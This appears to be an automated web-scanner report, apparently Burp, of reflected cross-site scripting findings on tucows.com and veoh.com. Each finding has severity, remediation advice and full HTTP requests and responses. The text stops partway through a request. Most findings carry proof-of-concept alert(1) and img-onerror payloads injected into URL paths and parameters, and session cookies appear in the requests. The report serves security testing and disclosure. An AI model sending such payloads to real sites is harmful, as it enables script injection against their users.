GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:31:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 284587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.386. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/software.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49601
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 55803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/ Connection: close Content-Type: text/html Content-Length: 55720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.390. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:46 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=59 Content-Length: 57827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 57783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 77754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; 